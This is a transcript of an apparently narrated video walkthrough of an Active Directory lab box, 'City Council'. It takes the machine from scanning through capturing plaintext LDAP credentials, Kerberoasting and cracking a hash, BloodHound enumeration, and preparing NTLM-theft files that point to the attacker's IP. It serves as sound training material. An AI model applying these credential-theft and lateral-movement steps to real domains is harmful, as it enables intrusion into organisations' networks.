Okay. What are we doing? We're doing a new machine on Hack Smarter, which is called um City Council, I think, and it's actually a really good box. It's an Active Directory machine, and you're basically attacking a city council. And their Active Directory / their website. So, um, the reason I'm making this video is because I think the box is actually really good, and it's good preparation for whatever certifications that you might be looking to do. I think that it's actually not a very difficult machine conceptually, but it has a very large chain of things that you have to do together, which makes it very interesting. So let's go ahead, switch over, and so go to Hack Smarter. I believe that so the box is going to release today. I already did the machine yesterday, but so if you're wondering like um why I already know how to do the machine, that is why. So I've actually already completed the machine. Um but yeah, hopefully I don't reveal the flag here. I did reveal the flag. It's okay. Um let's see. So boop boop boop. And you need to download your system. What is it called? Your VPN. So go ahead and download one of those. Get that into the downloads directory, and then create a new terminal. Let's see. sudo open VPN, and then lab city blah. Put in your password for root or sudo, I mean. And then let's create a file. So we already have my original write up on it. We're not going to use that. We will make another one, and then we will do IP address here, and we have to wait actually like 5 minutes. So like always, especially with like these types of boxes, wait like 5 minutes for the services to actually like start up. So in that time, I guess we will talk about what kind of tools are we going to be using. So we're actually going to be using PowerView, Python, PowerView Pi. And what I want to do, one of the tools shall be using PowerView.py. Um, I've been kind of hesitant on like actually learning PowerView.py specifically, and like really I want to have like one tool where I can do basically everything that I need to do instead of having to switch between multiple tools. But you also should have the ability to switch between and do whatever attack that you're trying to do with multiple tools. So like it's a good thing to know multiple tools. I'm just saying like you should you should have a tool where you know that you can enumerate everything in one place basically. So the machine is running. I've talked a lot. Let's try. So we already have city council here. And we can see that I've already done a lot of work, and I kind of did a little spoiler there, but hopefully you didn't see too much. Let's make another directory, and we'll call it city council. Ooh, city council. City council the second. Okay. So new directory, and I like to have a file. Normally, when it's a multi-machine, I like to have a folder instead of just a single file where I put everything. But because it's a single machine, I'm just going to put it all in one file. It's not going to be as organized. We have the directory here. So I'm going to run a nmap scan, and this is using a script called Threader 3000. I've modified this script so that it runs a little bit more efficiently. But yeah, this is basically what the GitHub is. It's just running nmap. If you want to use another thing, you could use rustscan. We're basically just threading in order to see. We're sending packets in order to see which ports are open, and then so we can quickly get this. Did I run this in a production environment? Probably not, but it's nice to be able to see like quickly. Okay, what ports are open? So we can see that port 80 is actually opens, which is the web server. And then we can run, as you can see, this is the specific nmap command that is actually being run under the hood. So it is nmap, and then it is all the specific ports, and then it's running -sv -sc, and then it's doing a I don't know if it's thread 4 or whatever, but it is whatever their -t command is. And then pn is like something. So then you don't do a connection, whatever. And then outputting into the actual name of the IP address. So it's going to output as this. And let's see, hacking articles. So we know that there's a port 80 open. We know that it is a DC because the DNS and the port 8080 is like the Kerbero is something. And we can see that there is, what is it called? There's RDP and then there is WinRM. So WinRM. Let's move on and let's go to the actual IP address. So one thing I like to do in my setup is I like to do a target. This is basically just setting video echo target. It's just an alias basically to set my IP address. So normally what you would do is you do target and then equals, and then you would put the IP address like that. That's basically what I'm doing. Except with this, I'm setting it for every single one of my terminals, so that this is like a global variable called target that it has the IP address of the machine that I'm running. So just so you know what we are doing. So that is that. Let us actually go in and where's the IP address? Let's get here. Let's go here and we can see already. We can run something like Go Witness or something like that in order to get an image of every single web directory. But we can see from the initial like viewing of the website. Let's see. So I like to put it something like this. Should try and keep organized as well as you can. Obviously, I'm struggling because I can't copy and paste. But yeah, okay. So this is HTTP, and we're gonna put 80. And I also like to do so like sometimes there's going to be multiple IP ranges and like multiple DNSs. The way I separate it in my notes is that like if it was a multi-machine lab, what I would do is the first file would have, every file has its own IP address basically. And so that might not be as efficient when you're doing like thousands and thousands of IPs, but when it is, a smaller lab environment, that's how I normally like divide that's my organizational scheme. So yeah, okay. So we visit HTTP and then the IP address and we get this web page. Now we have to enumerate a little bit. One thing I like to do is try and figure out like, hey, is this a static website? We can see that index.html works there, so something to take note of. It might be see that HTML turns the web page. This might be an indication that it is a static website. And what that means basically is that they're not running something like PHP in the background, or they're not executing files. It's not dynamic in like that. They probably don't use JavaScript or anything like that. So they're not actually dynamically loading the page or dynamically changing things. We can see a couple of things. So this is the navigation bar in the source. We can also see, let's see, here's something that is interesting. So this is in the source code that we're looking at, and we can see that there's emails here. So there's a couple of emails that are being leaked. Obviously, if we look at what the page is actually showing, it is showing the team and then their emails right here. And so that is a good thing to enumerate, so then we know, okay, so these might be potential users that we will be attacking in the future. And so what I like to do is just, go ahead and just go into the source and take their emails and then put it into a word list and do something like that. Nice and quick. There's probably a faster way to do this, but it's fine. So we can put this into a user list and we can begin enumerating like off of this. So we could do users.txt, put this in. Let's go ahead and copy this. Oops. Copy it again and do a control. That's not gonna work. Okay, that's fine. No. Obviously, as you can see, I'm not actually that good at using them. Alright, that's fine. That works. As long as it works. As long as it works. Let's see. We also see that we have a contact page. Where we can send a message. We can open up something like Burp and see if this is actually sending a request, or we can do a, what is it? I want to open up Inspector. Ooh, we just opened up elements in our Obsidian. Obsidian is also a web browser. It's like an Electron application, so that is kind of interesting. You can open up the inspector in Obsidian. So if we do network, go into the network tab. Bingus. We probably actually need to put an actual email there. General inquiry. We could just put like a quotation mark there just to see if there's, or a single quote just to see if there's like some kind of database or something. So we can see there's like self-access, that's just a thing going on here. And there's nothing actually going on in the network. So normally, like in this network tab, if you had done a request and it actually like sent home or something, there would be some kind of indication in the network tab. Normally, I believe at least it should. So like if it was actually doing a request, it would be caught in the network tab, is what I'm saying. So we can see that that is not the case. Also see, here's some OSINT information in case we need that. So we can see the administrator's email as well as a phone number and a state and et cetera. We can see office hours. So if we needed to do like actual red team stuff, then that is a good thing to know. So from here, I would probably actually do a Ferox Buster. Should have been running already in the background, but you know. So this is basically a directory brute force where we are looking for various, looking for all the directories that might be there. We can also see like, hey, these are, oh, these are the tags. So like it is like the headings, I guess, that you can like go through. So if we did something like, is it hashtag home? Will take us to the top of the page. Or if we do hashtag about, it'll take us to the about section of the page. We go do hashtag like services, it's going to take us to the services part of the page. That is something to keep in mind as well. If we do contact, and we can see like, yeah, this is what is going on. Let's see if we can do any other links. So all these links lead back to those. There's some resource pages here. So here, and here. Open up these pages and we can see so a good practice would be like actually having like something like Burp Suite open. So we can see that this is giving us only 404s. It is almost done. The only useful output, we can see that there's an uploads directory, which is interesting. So here, let's do Ferox. And it is on GPP on 80. So you can take this, we can see there's an uploads directory as well as all of the 200s. So all of these are actually pages that will return something. And so from here, I would probably actually, I would enumerate each one of these pages. I would also run another Ferox Buster scan here. And do something like, we can do -X and we can do the various extensions. So we can do something like this and HTML.php, .txt. What else could we do? Python. Like if there was like a Python, if it was like it probably isn't, but if there was Python files, if it was running like Python backend, then maybe we can run that again, and it'll run using those specific extensions. As you can see, it increased the word list by like a lot. So it like multiplied this by however many extensions that we actually put. So it's going to be a long time before that actually gives us anything back, and it probably won't give us anything back in this case. Let's look at our Nmap scan. we can see this is the only important part of the nmap scan. We can also see that there's a clock skew of -1 second, so there is no clock skew. That means that our clock is basically synced up perfectly. So we put the nmap scan here. We might also have to do a UDP. So let's do this. So this specific nmap scan gives us this return. We can see that there is the IIS on port 80, so it's a Windows. Dude, let's see. There's SMB open, so we need to enumerate SMB. There's LDAP and stuff. Let's go ahead and put this here. 445. One thing I like to note at the top is, so see that this, we will go into this a little bit later, but that's fine. Always wait 5 minutes. One of the tools that we will be using is PyReview.py. That is very true. Let's go ahead and put setup as well as general enumeration. We want to just put this here that there is WinRM and there is what's it called? There's LDAP that we need to enumerate, and there's also RDP. So I like to don't necessarily need to put LDAP there. Actually, I will put LDAP there because these are different ways in which we can remote. With LDAP, you could do an LDAP shell, so that's something to keep in mind. There's always a LDAP open, but yeah. Okay, so for setup, what I like to do is I have a little command called genhost. And this is actually just, we go here, we do genhost. We can see that we are running sudo on the local bin of netexec, and then we are doing smb target, and then the anonymous login, and doing a generate, and then going to Etsy hosts. So if we do cat Etsy hosts, cat Etsy hosts, spell it right, cannot. So we can see we have give back, we have all of these different things. We did not actually generate the host. This is because our target is empty. No, it is not because our target is empty. It's because our target is wrong. So our variable is wrong. That's why we didn't actually generate anything. That was because the terminal was already open. So I don't think it doesn't update. Okay, so there we go. A netexec command that actually works successfully. It was an anonymous login and that generated our host file. So this is a nice way to do things. So then you get the proper ordering of the DC, the domain controller address, and then the what's it called? The domain name. So in our /Etsy hosts, with this, and then I also have a thing called right here, gen_care_b, which is do gen_care_b. This is going to generate our care_b5 conf. This is not necessary for this box specifically, but in the event that you need to do Kerberos authentication for a machine, this is something that you will have to do and have to struggle with. Basically, Kerberos authentication is the replacement for NTLM. And so like there will be no password authentication, that kind of stuff. You'll be using like a CC cache and things like that in order to authenticate to the machine. So that is something to keep in mind. We will not need this for this machine, so we're chilling. We got our Etsy host. Windows is very particular with the way that it uses domains as well as the DC. Like it is very, very, very particular with the ordering and everything. So just be careful with that. If you are doing it manually, so you can just go in manually and edit the Etsy host file and go to the bottom and put the IP address and then the DC as well as the city.local. Where would we find that information? So we can see in the nmap scan right here, there's the NetBIOS computer name that is dc-cc, and then we can see that the domain name is city.local, and then we can see that the DC, the actual domain computer DC is actually dc-cc.city.local. So you put the DC address first, then you put the domain address, then you put whatever computer address that they want, the computer name, if you want. Anyways, so now that we have gone over all of that and I've bored you to death, let's go over and actually enumerate this. So we've opened all of these pages. we got all of these pages from this resource section. So there's this resource section. We've opened all of these pages. We could have also enumerated it using this Ferox Buster. So 2 ways to enumerate these pages. We can see that there's document forms, emergency, FAQs, and city news, and that correlates with all of the resources that we found. We can see right here, there's a digital service portal, and there's 2 binaries that we can download, one for Windows and one for Linux. We can see that they're talking about running the Windows binary with Wine. And so this is some kind of portal that you can access, and then they're telling you to do the Etsy hosts. So what we just did, it all comes together, guys. Don't worry, I know what I'm talking about. I swear, it's all planned, right? And then you can see that there's dependencies that they want you to install. They want you to have Python 3 TK. I don't know what the TK stands for. Maybe TikTok. I don't know. Let's go ahead and download this file and we'll put this into our saves. Let's go through the FAQ real quick. If there's anything, I don't see. There's a little bit of information right here. Phone numbers might be interesting. Other things, yeah. Phone number, business days. Typically, this is the processing time for planning or getting permits. We can see that there's a search bar. You might want to do like XSS or something here. See that there is self-XSS here on the search bar. So we will do, what is this? Okay. So this is FAQs. I will do a third header and we'll say there is, self-XSS here. Nothing you can really do with that, but just something to note. Access. I mean, there may it wasn't self-XSS. Let's say it was stored, or if it was something else, might be able to do something with it. In this case, it's not connecting to anything. It's not doing anything, so we don't really need it. Don't really need to use. So we can see this copies. Choose application. So we can call. Oh, okay. These are making calls and accessing our browser like that. Okay. Emergency, we can see that this is poorly formatted for whatever reason. It is another input box where we could test SQL injection, we could test all kinds of things. So this is the emergency infos. Emergency infos. As to not waste time, we're not going to go through. Well, we can try. Where's the submit? This one's weird. And another thing, so open up the network tab, see if this actually hits. We can see it doesn't. It just gives us self-XSS. Okay, that's fine. What other pages have we not looked at? Oh, this is all good. Okay, so we got that binary. Go ahead and copy it from our downloads. And it is called City Services bin. And let's chmod plus X. So this is giving it an executable permission. And we haven't actually enumerated SMB yet. This is not a normal thing that I would do. I'd always enumerate SMB first. But in this case, I am disillusioned by knowing the path already, so that is why we have not enumerated SMB yet. We will enumerate SMB before we go on to this binary, though. 1 second. So we have this. Show that we have this binary. And so let's just call this city _services portal. Let's enumerate our SMB. So we can use the netexec module, and I don't know if you guys can see this, but we can do the netexec module, and then we can do the target. So just remember, my target variable is just the IP address. So if I do echo and then $target, if I can spell, we can see that the IP address is there. I just like using the variables because that's just what I am. Dash shares. So this will give us anonymous login. If anonymous login was enabled, we would be able to enumerate the shares, but we get an access denied instead. So we can see that anonymous login is no go. We can check for guest authentication. So try something like this. You can see that the guest account is disabled. So that means that we are not able to enumerate with the guest. And I like to just quickly put commands that I ran above the images that we take. So something like this. So this is a good thing. You shouldn't have your guest. This is a good thing. Guest counts and anonymous login should be disabled because you don't want just anyone. You don't want anybody to be able, just anyone to see what's in your shares. You do like miss permissions, you put something in your shares that's not supposed to be there, credentials, whatever. It's bad because they don't even need any type of password. They can simply log in as a guest or they can log in as an anonymous user, which is basically anyone, and they'll be able to see those files, and that will allow them to, potentially privilege escalate and do all kinds of malicious things. So now that we have gone over SMB, we can try. Let's see, what else can we try before we move on? Let's see, what other things have we missed? Nothing. There's LDAP. So we could try and do an LDAP search and see if we can anonymously enumerate that kind of stuff. I will quickly do that. So do LDAP. Let's see. Do we have LDAP? Weird. Okay, there it is. So we have an LDAP search. This will give us the blah, blah, blah. We do not have a password, username or password, and we don't have we don't have LDAP authentication yet. So we can't actually do any of these. We could do this base naming context and it will give us the domain name and stuff, the DC. So if you ever needed that, you wanted the naming context, so the dyslexians and stuff, the domain zones. We can also have enumerated DNS. That is something that we missed. So normally after nmap, I would actually enumerate DNS. Let's go ahead and do that. So let's give a quick reverse lookup and try and see if we get anything from here. And as you can see, all my notes, they all use a variable, for example. This is not going to work. I think this is a reverse DNS lookup. And this is me trying to connect to that, and the servers could not be reached. So we can't do that. Oh, it was because this will not work for Windows, I think. That is why. So let's cat our Etsy host. As you can see, there's a domain variable right there that I didn't do. So one thing that you can do is you can do domain equal and then the city.local, and that will set the variable in this specific terminal. What I have is I have a little script that lets it set in all of my terminals. So domain and then city.local, and then we want to do the DC as well. So we want to set those variables, and then we can use this command. So it is a dig and then a plus no. This is just to remove all of the fluff, I believe, and we can see a little something here. Just like this is the local IP address, city.local. Okay. Interesting. 168. No, it's not. 168. What is this IP address actually? Not ping it. And I think it is maybe the local IP address of it. Let's see. We cannot do a domain. We probably cannot do a domain a zone transfer, but we can try. Transfer fails. So let's put this all into our notes real quick. Something like this, and let's make that JSON so that we can see. Let's see. So we got this back. We got this IP address for the A record. Oh, okay. So that is for the A record. I see now. When you're setting up a website or a domain name, DNS in like a Cloudflare, for example, or Namecheap. What am I thinking of? Yeah, like Namecheap, they have their own dashboard. You can add records and stuff, and those records have IP addresses that are related to them. I wish I could say that I know more about the topic, but I do not. Um, don't know exactly how the records work, so let's not talk about it. Let's go to the binary now. So let's go here. Add this binary, and what we can do instead of doing back, we can actually run that binary, and we get a application here. So this is the city council public service portal. And we can go through and we can see that you can actually submit an application with the city and get your licensing, your building permits, your whatever, your marriage certificate, your tax assessment inquiries, whatever. So let's do a quick submit of an application to get a test run. So we can see that there's an LDAP bind request to the portal service authentication. Now, when I originally saw this, I was thinking to myself, like, there was a couple of things that went into my mind. So um I didn't immediately pick up what was going on. I did have it in the back of my head though. So what is going on in the back end is that they are doing an LDAP authentication. And so my thought process was that maybe we would be able to sniff using responder or something like that. Not sniff, but do an LDAP, what is it called? App relay attack or something like this, where we do a if there's like some kind of command injection or thing like that, and it's connecting to the database, then we can run a usage of a share that is on our attacking machine, and that will leak the NTLM hash. So that doesn't make sense though. Logically, that doesn't make sense because we're connecting to them instead of them connecting to us. So what we need to actually do is we can still try. So this is the first thing that we're gonna do. We're gonna try and just try this type of relay attack and just see like, okay, um, relay attack. I don't know if this is actually the name of what it is, but this is just what I've called it. Responder is spelled wrong. Responder. I'm gonna be honest. I don't know how to spell it. Wait. ah, there we go. Okay. So we run responder as sudo, and we did this. Have responder running. Very cool. Let's not actually put that there. And then we can do something like, so if there was, for example, if this was on the website or on the server side, we could, and we had some kind of command injection where we could do like a who am I or like a ping or something. We could connect back to our share. So my thought process was, okay, we can delete this. We could do something like this. Maybe we can just put like net use and do something like that, and like, I don't know, magically it would work. This is not how it works though. In real life, this is not how it actually works. So we can see that we're doing this dedicated service. We can see that there's this portal account that we're actually authenticating with. So SVC services are our target. SVC services underscore portal is our target user. And as we can see that we didn't actually get anything returned there, and one of the reasons we didn't get anything returned there is because we put the wrong IP address. Let's see, UOB. The IP address actually has to be your ton zero right here. So right here we have our ton zero IP, and so we have to actually change this for it to theoretically work. We can run this again just to see, like, okay, this isn't gonna work. Do 238. 61 here as well, just to show you that it's not going to work. So normally what would happen is, like, if you were able to do some kind of command injection here, which you can't, it is a application on your side. This is a bin that you are running on your machine, so it doesn't make sense why it would work. So yeah. Let's see. We do this, we successfully authenticate and do all those types of things, and we're authenticating with the service portal account. So SVC services portal account. We're authenticating with that user. Now, what we need to do is we need to do an actual LDAP sniff, and what we should do is should do like a TCP dump TCP, no, not a TCP dump. We need to basically do some kind of Wireshark thing here. So let's try and search up LDAP sniffing and try and figure out like how exactly would we do that. And testing, blah, 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 Wireshark, sniff. So the way I would actually do this, the way that I would do this is I would just start up Wireshark, right? Don't think about it, just start up Wireshark, and the interface that I would be listening on would be probably, would it be ETH0? And hopefully this isn't revealing anything important. It is not. It's just revealing my local IP address. ETH0, would it be on the ton0 or would it be on the ETH0 is the real question. We actually can't see the ton0 here, so I guess we'll just go with it. Oh, here it is now. Interesting. So I think normally I would actually use the ton0. So we could try and do that, and then we can run the request and see what happens. If we get a request through our ton0 IP, but I think maybe it's not going to work. So we ran this. Oh, interesting. So it did work. And it ran through our ton0 IP, and we actually got the packets that we were looking for. So here, we've actually done it. Very surprising. This is not how I did it originally. But this is how I would have done it if I was using my brain. What we did was we ran sudo Wireshark. You have to run Wireshark as the privileged user, and then we connected to the ton0 IP, or the ton0 interface, my bad. The ton0 connect to the ton0 interface, and then run the service console submit. So submit an application. And then submit an application. I can already tell this is going to be a long video, but it's going to be a fun one because we're going to be going through so many different topics, so many different like things in this that I think it'll be really valuable to people. So hopefully, if you're interested, you'll stick with me. So we can see that we actually get some requests back from this interface. So we can check now. We can look through. So what I'm looking at when I'm looking through this, I'm just looking at if there is any credentials that are being shown in plain text, and we can see in this specific request, which is on the LDAP instead of the LDAP-S. So if this was running through LDAP-S, right? If this was using LDAP-S instead of LDAP, it would be encrypted here, and we wouldn't be able to. We would have to do a little bit more work. We wouldn't be able to see this in plain text, basically. We might be able to still get the credentials by doing a binary, like doing a reverse engineering of the binary and then finding the credentials hard coded in the binary. So if it was using LDAP-S, that would have been the next step. But because it is using LDAP here, we are actually able to see the credentials in plain text. So here, what I would do is, first off, take a screenshot. If you didn't take a screenshot, it didn't happen, right? Like if you didn't take a picture and you didn't post it on Instagram, it didn't happen. So in this case, it is very similar. You have to prove that you've actually done the thing that is required. So there I did UTF-8. I think what you should actually do is you should copy as ASCII text, and it should copy properly. It did not. That's fine. We can just remove this gibberish, and we have the information that we need. So we can see our user, and so this is going to be the credentials. Normally I'd have a credentials file where I would put this, but this is the credentials. Always copy and paste the credential, by the way. Never type it out. Even if it is a simple credential, I always copy and paste it because I am paranoid now. I never like to trust my typing abilities over the ability to copy and paste, honestly. Like I can't, especially specifically when it comes to passwords. So you never know. One of the characters could be weird, etc. So SVC portal services. We have this user. Let's try and test with SMB with this user that we have obtained. Obviously, you can see that I actually spelled the username wrong there, which is classic. This is the username. This is the password. Let's put the password in here. And we can put this in as a variable as well. Normally, what I would do is I would put the password in as a variable, so then you wouldn't be able to see in the command what the password is. And we can see that we're missing the target. We need to put the target here. That, okay. And we successfully authenticate, and we can see some shares. So there's a couple of non-default shares in the SMB. Let's take a note of that. There's an uploads directory. There's a backups directory. So those are two interesting shares that are non-standard. Non-standard shares on SMB. And we can also see, yeah, we got authentication. We got authentication as the SVC services portal. So from here, there's a whole bunch of different things that you can do. You can Kerberoast, you can AS rep roast. We could have AS rep roasted even before we had credentials if we had a username list, which we did, so we could have done that. Let's go ahead and go over that before we move on. So AS rep roasting, and we're going to use PowerView.py actually. So let's try and use it. Well, actually, let's try. Let's see if PowerView, yeah, no, PowerView. Then they need us to connect. I guess you need to connect before you can do it. Let's try and do that. Do dash dash help. And then let's see. So they like to do it in this type of formatting. So it's domain, then username, then password. Okay. So do PowerView, then do $domain. So just to remind you, $domain is city.local. So it would be PowerView, $domain slash, and then it would be the username, which is SVC services underscore portal, and then the password, which is here port. You wonder why I put this in single quotes is because the way that my terminal works, it doesn't like escapes. There's no character that would escape out. So like if there was like a exclamation mark, for example, it would cause me problems. And then I think it does at and then the target, which is the IP address. So this should connect us into PowerView.py. Yeah. So this is a working command just to see what it looks like normally. This is what it would actually look like without the quotation mark, without anything. This is what it looks like. This will also work. Go. Get out of there. So take this command, put this in here, log in via PowerView.py. And let's try and do this like that. So we're gonna have to look at the documentation because I have no idea how their modules work, and we're gonna have to figure it out because that's what it's all about. PowerView, Python. Figure it out. Let's figure it out. So we're gonna try an AS rep roast with whatever module. So AS rep, and so they want us to do invoke AS rep, and I assume that they also have another section with it. They don't. Okay, let's just try it out and see what happens. So do this. Actually, do that. And as you can see, there's a Python error. Invoke just help. So we have identity, we have search, we have some options here. Table, no wrap, no cache. So let's see. We do help. Nope. Don't have a help command here. Don't have an ls command here. Do they have a dash dash help command here? Yeah, they do. Okay, so here are some positional arguments. Here are some of the arguments that we can do. So we can do usage where server is okay. Let's just try and do a basic command first. So for example, login as get domain. Let's just try that, see what happens. So we do get domain and it gives us a bunch of information. We can see a couple of vulnerabilities, which is kind of interesting. Domain with password complexity is disabled. So this means that any password is accepted. So there's no password complexity. There's no limit. There should be a password complexity, so then people can't put like really weak passwords. So password complexity, as in like it should have a minimum amount of characters, it should have special characters, it should have et cetera, et cetera. There is domain without account lockout policy. So this means that we could do a brute force attack and there wouldn't be any lockouts. Domain with weak minimum password length. So we can see that 8 is the minimum password length. Okay. Apparently, complexity is to do with the special characters and things like that, I guess. Domain with high machine account quota allows users to add computer accounts. So we're actually allowed to add computer accounts as a normal user. So that is something to note. Let's see what other things that can we do. We can do a ACL, get domain object ACL. And we can see this is a lot of information, but this is all of the ACLs in the domain. So, account operators. And so this is kind of enumerating from like BloodHound almost. So another thing that we could use actually is BloodHound. Before we move on to BloodHound though, let's try and get this AS repros to work from here. And let's see. So AS reprost. We did run AS reprost and it failed, so I assume that obviously maybe it's just not able to work. So that didn't do anything. Let's try and do the Kerberoast. Invoke Kerberoast. So that worked. That worked. We got a user's Kerberoastable flag. So AS reproast returned nothing, which means that it failed. So we did, and I'm just going to take a quick screenshot of that. So we can see that AS reproasting didn't return anything, but Kerberoasting actually did return something. So that is very cool. Kerberoasting. So Kerberoasting from PowerView.py, and we'll just paste this again. Something like that. Sorry. And then we'll do, what is it? What is the thing that we did? We did invoke Kerberoast, and here we did invoke AS reproast. And there's an extra R reproast. Sorry. Okay, so we invoked Kerberoast, and we got a Kerberoastable hash. We got the Kerberoastable hash of Clark John, or John Clerk, or Clerk John, yeah. So clerk.john.hash, and we can see that it is formatted very poorly. So here, I wonder if, so using Vim, we could probably do something where we remove all the spaces. Do I know the command by heart? No, I don't. Let's see. I also do a set command like that. Formatting, blah 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 blah. Well, we could just try and use it and see if Hashcat actually just takes it, but I'm pretty sure it won't. rocku.txt. So we're going to be using rocku, which is a password list, and then we're going to give it the hash. We should actually get the hash first, just in order of operations thing that I like to do. So give the hash first, and then that. It has an invalid hash. Has an invalid, what's it called? Formatting. So go in here, do a Control V, and then we can select. We can actually just go ahead and remove all that. That should be fine. Now let's try. It is still invalid. That's unfortunate. It is unfortunate indeed. It is because each and every one of these lines is its own line, which is an issue. It doesn't like that. So like this formatting right here, basically the issue that's happening is that each and every one of these like character lines is having a new line, basically. So we have an issue with formatting of the hash. See that each line has a new line, elements, you have to remove that in order to actually the proper formatting for AFCAT. Let's see. So here I would probably just use AI, I'm gonna be honest. I would just give well, you shouldn't give the hash to AI, you should probably just actually ask it to give you a command that removes all the new lines. So there's two ways you could do this. You could use vim or you could use the set command. So we'll ask for both. So using vim or using the set command. And using the set command. I want command. Actually we'll just do using vim. How would you move all the new line characters of a file in order to have it one continuum? Said. So it's probably gonna be like said backslash blah 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 blah. Yeah, okay. So it is %s and then backslash n slash g. Interesting. So from here, we do something like this. Move that. This will format it correctly, which is changing it from all of those lines, as you could see before. It is just one line now. So, and why don't I know that substitution by heart? I don't know, skill issue. I haven't really used it. So, alternatively, you can join all the lines into one with %j. Interesting. And then the said process would be something like this, which is kind of different. And we can also use the tr command, which would remove, this is like a trim command, which would remove the new line. This is probably the way that I would actually do it because it is the simplest syntax. So do something like that. Either way, let's try and use the hash again and try and crack. And we can see that it actually cracked properly. So just a little bit of thinking there that was required in order to format it correctly. The way that I normally get Kerberoastable hashes would be using using Impackets tools in order to do the Kerberoasting instead of PowerView.py. But again, we're going to be using PowerView.py as much as possible this video, just to show you that it's a really good tool and you should know how to use it. Let's see. So let's see. BloodHound. So we need to get the BloodHound data. The way that I like to do it always is I like to go, the order of operations is I try to do SharpHound first if I have a login. So one thing we didn't check was if, for example, this user that we have, this SVC user, if he was in a group like remote management, he'd be able to log in via WinRM. So we could do an evil WinRM-I and do a services underscore portal and then password. Oops. So the I is actually the target IP, and then that would be that. Okay, so let's give this here. And I gave a capital I instead of a lowercase I. My bad. And we can see that we failed to authenticate. So just a quick little thing. Hashtag, I guess, VC portal or services portal failed to authenticate to using evil WinRM. The next thing that we could have checked is RDP because there is RDP open, so we could use Ramina and try an RDP in. Another way that you could have enumerated this is by getting the BloodHound data, which is what we're going to do. So this is why I didn't check immediately, but yeah, so let's get the BloodHound data first, and then we'll be able to enumerate it that way. The way I like to do it is I like to do it via rusthound first, always. So we do rusthound, and then the domain name, and then the password, and all that stuff. So you can see that it worked. It shouldn't have worked, but the reason it worked is because I have variable set for a username and a password from previous. So let's just echo this out and show you what the command actually looks like. So this is the actual BloodHound command. Oopsies. Like me. Okay. So we can see we do rusthound CE, then -- domain, city.local, and then -u services, and then the password, and I do -z at the end for zipping. So we zip the information right here, and we have the BloodHound data. We can move this file so then it's something that is more readable. BloodHound data dot -rust hound dot zip, and so that is more readable. We can use a tool like Griffin to check if the BloodHound data is showing us all the information properly, and we can see really quickly some of the information that is leaked. So our specific user service portal or SVC services portal doesn't actually have any permissions, it looks like, but we can see that there's John Clerk, which is a user that we have that might have something that is Kerberoastable, actually. We can also see what else? So K means what is it? What is it? Does it tell us? Yeah, this may be a Kerberoastable user. So we can see that John Clerk was actually Kerberoastable, and we were able to Kerberoast his hash. We can see that Emma Hayes has right dackle on the city ops domain. It has generic right on the quarantine. It has right dackle on Sam Brooks, who's disabled, a disabled account. So we can see that this, using this legend, we can see that a crossed out user is disabled. We can see that Sam Brooks is disabled, but it is in remote management, which is very useful information for us. So this is quickly looking at the BloodHound data without actually opening up BloodHound, which is really nice. I really like this. I really like this tool. I work on this tool a little bit from here and there because there's a lot of issues with it, but it is a nice tool to have. So this is Griffin output. Griffin output. And let's go ahead and copy the Griffin. Yeah. Have to continue development on this because it is a very nice tool. Let's try and do Bloodhound now. So I'm going to start a Bloodhound. What you would do in your terminal is you would do something like Bloodhound CE or CLI. I don't use Bloodhound CLI. I use a different configuration of Bloodhound, but it's all the same thing. I can't go over exactly how to set it up right now, but if you go through the documentation for Bloodhound, you should be able to figure it out. And let's see. So now that we have done that, this is not going to work. Right. Where is it? Let's go here. Open a new tab. Bloodhound UI. Oops, blood. So we can see that it actually started up. And I need to quickly get the password for my Bloodhounds. 7. Ooh. Really suck at spelling my password out, not gonna lie. Hopefully I actually got it. There we go. Do a little password managing there. So I actually already have the Bloodhound data uploaded, but I'm gonna quickly show you how I would normally do this. So go here, go into administration, then go into database management, click on all of these and delete the previous data. Oops, delete the previous data. And then we're going to do a file ingest. We're going to get our file. So we can see we have City Council, the original. Let's go into City Council 2 and actually get our BloodHound data from rusthound and upload that. And sometimes this doesn't upload properly. Now, I would recommend you, like if you don't see this like uploading properly or something, like it might get stuck on ingesting, or you might not even be able to see that it has been uploaded. Just change the rows to like 100 or something. Sometimes that fixes it. Sometimes like you might not be able, like what I'm talking about is like you might not be able to see that it's ingesting, which is kind of annoying. So just change the rows. Okay, it got canceled. Yeah, sometimes it's like that. So this is another reason I like Griffin, because you can quickly enumerate the information without having to open a BloodHound, which is a time sink, especially when all you need to do is all you really need to know is that, okay, Clerk John, he's what is it called? He's Kerberoastable. We can get his user, and then from there we can maybe do something with him via like SMB or something. So we can go ahead and just do that right now, actually, instead of looking at the Bloodhound data. So the user is clerk.john, and the password is clerkhill. You can see that this is a weak password. It has no characters, no special characters, no capitalization, nothing. So let's do netexec SMB, then the target IP, and do -u clerk dot dot, and then do -p, which is clerkhill. And let's just check if it authenticates. It authenticates. Okay, we get authentication as Clerkhill or Clerk John. So let's do a Clerk John header, and we can see really quickly that we actually have access to an uploads directory right here. And so we have access to this uploads directory right away. Whenever I see upload, I always think to myself, like, okay, how do we do a slinky on this? Because Slinky is basically you write a link file into a share in order to get NTLM theft. So another thing that we could use, and I'm going to actually use the NTLM theft module instead of the link file just to showcase. I have no idea where my NTLM theft pi is. Okay, it is in tools apparently. Python, and then let's do --generate, and let's do the correct server name, which is going to be 10.238.61, and then our file name is going to be Bingus. And we can see that we don't actually have a template, so this is not going to work. Cool. Move Bingus, and let's see, where is the other location? Right here. Okay. So let's do Python from here. And so this is the reason we have to do it from here is because this is where I get installed it for a specific box. I believe the box is flight, so that works. We go into Bingus. We can see all of the link files are in there. Let's see, how did we do the NTLM theft? How did we do the uploading? We didn't actually put into our directory how we did the uploading, which is kind of stupid. Let's see, owner writable, Slinky. So Slinky would be a faster way to do this. I'm just gonna try and do this way because it might work, it might not work. Let's go to flight, and then let's see. Did I do it here? Did not. Interesting. So very interesting. How do we want to go about this? So we have generated all of these files. Now we must upload all of these files. So we could do it one by one, which is kind of lame. We could do one at a time. I know that the link file is going to work. Let's go ahead and just do an SMB clients.py. So, okay, I'm trying to think. If you didn't know that this would work, and you had to upload all of them, how would you do that? SMB clients. Hi, let's see if we have it here. So addresses, current, API, no, impersonate, SMB client.py. And let me just see if I have the loop here. UDK method. It is not. It does not exist. Okay, that is unfortunate. There's quite a lot of information there. It's fine. All right, screw it. We're not going to do it this way. We're not going to do it this way because it's a little bit too much of a time sink. But basically, you do a loop with SMB client.python. It's a weird syntax. That's why I'm a little bit confused as to how I did it before. I believe the way it works is SMB client a Python, and then do --help. If you do input file, so if you do input file, and then you generate a input file, so like test.txt, and then you put all the different various commands. So you do put and then whatever the file name is. So like you would basically just generate a let's see. We regenerate the thing just to showcase what I'm trying to get at. So ls, if you ls bingus, and you can see each and every one of these file names. If you get each and every one of those file names into a file, and 